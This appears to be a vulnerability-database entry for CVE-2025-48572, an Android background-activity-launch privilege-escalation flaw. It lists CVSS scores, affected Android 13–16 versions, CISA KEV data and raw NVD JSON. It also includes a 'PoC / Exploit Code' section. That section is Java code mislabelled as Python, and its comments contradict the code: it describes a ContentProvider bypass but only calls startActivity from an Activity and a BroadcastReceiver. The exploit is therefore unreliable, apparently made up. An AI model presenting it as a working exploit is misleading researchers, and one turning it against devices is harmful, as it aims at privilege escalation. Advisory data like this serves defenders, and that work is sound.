Security Vulnerability Report
中文
CVE-2025-48572 CVSS 7.8 HIGH

CVE-2025-48572

Published: 2025-12-08 17:16:15
Last Modified: 2025-12-10 02:00:03
Source: [email protected]

Description

In multiple locations, there is a possible way to launch activities from the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android Framework < 2025-12-01安全补丁版本
Android 源码 frameworks/base commit e707f6600330691f9c67dc023c09f4cd2fc59192 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48572 PoC - Background Activity Launch Permissions Bypass // This PoC demonstrates the permission bypass in Android's activity launching mechanism public class BackgroundActivityExploit extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); // Exploit technique: Use ContentProvider.onCreate() to launch activity from background // This bypasses the normal START_ACTIVITIES_FROM_BACKGROUND permission check new Handler(Looper.getMainLooper()).postDelayed(() -> { try { // Target sensitive activities that should require foreground privileges Intent exploitIntent = new Intent(); exploitIntent.setComponent(new ComponentName( "com.android.settings", "com.android.settings.DevelopmentSettings" )); exploitIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); // The vulnerability allows this to succeed from background context startActivity(exploitIntent); Log.d("CVE-2025-48572", "Activity launched successfully - permission bypassed"); } catch (Exception e) { Log.e("CVE-2025-48572", "Exploit failed: " + e.getMessage()); } }, 5000); // Delay to ensure app is in background } } // Alternative exploitation via BroadcastReceiver with ordered broadcasts public class ExploitReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { // Abuse of ordered broadcast to manipulate activity launch context Intent maliciousIntent = new Intent(); maliciousIntent.setComponent(new ComponentName( "com.android.settings", "com.android.settings.Settings" )); maliciousIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TOP); context.startActivity(maliciousIntent); } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48572", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:15.003", "lastModified": "2025-12-10T02:00:02.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In multiple locations, there is a possible way to launch activities from the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-02", "cisaActionDue": "2025-12-23", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Android Framework Privilege Escalation Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/e707f6600330691f9c67dc023c09f4cd2fc59192", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-48572", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "US Government Resource"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.